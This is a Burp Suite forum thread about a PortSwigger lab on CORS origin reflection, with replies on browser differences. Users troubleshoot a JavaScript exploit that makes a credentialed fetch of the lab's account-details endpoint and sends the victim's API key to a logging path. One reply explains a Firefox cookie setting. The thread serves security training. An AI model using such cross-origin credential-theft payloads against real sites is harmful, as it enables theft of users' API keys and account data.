Burp Suite User Forum

Create new post

Lab: CORS vulnerability with basic origin reflection

Ngts | Last updated: Mar 01, 2023 07:46AM UTC

why do i see this message in firefox when i click on view exploit but sending it to victim works. (Reason: CORS header ‘Access-Control-Allow-Origin’ missing). Status code: 401. code: <script> fetch('https://xxxx.web-security-academy.net/accountDetails', { credentials: 'include', }) .then(response => response.json()) .then(resp => { location = '/logs?key=' + resp.apikey; }); </script> Also looking at the response i see there is no ‘Access-Control-Allow-*’ headers received in the preflight request. Though when i switch my code to use xmlhttprequest it works perfectly fine

Michelle, PortSwigger Agent | Last updated: Mar 03, 2023 12:08PM UTC

The victim in the labs will be using Chrome, so it can be worth checking the behavior in the same browser when testing out exploits. I hope this helps.

Trevor | Last updated: Mar 03, 2023 03:58PM UTC

I was able to get it working in Firefox with both of these requests (XHR and Fetch). The one thing I had to do was to make sure my Firefox settings -> Privacy & Security -> Enhanced Tracking Protection, did not block third-party cookies. Setting it to "Cookies from unvisited websites" worked fine. <script> const url = "https://xxx.web-security-academy.net/accountDetails"; const xhr = new XMLHttpRequest(); xhr.onreadystatechange = () =>{ if(xhr.readyState === 4) { console.log(xhr.response); } } xhr.open("GET", url, true); xhr.withCredentials = true; xhr.send(null); fetch(url, { credentials: 'include', }) .then(response => response.json()) .then(resp => { console.log(resp); }); </script>

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.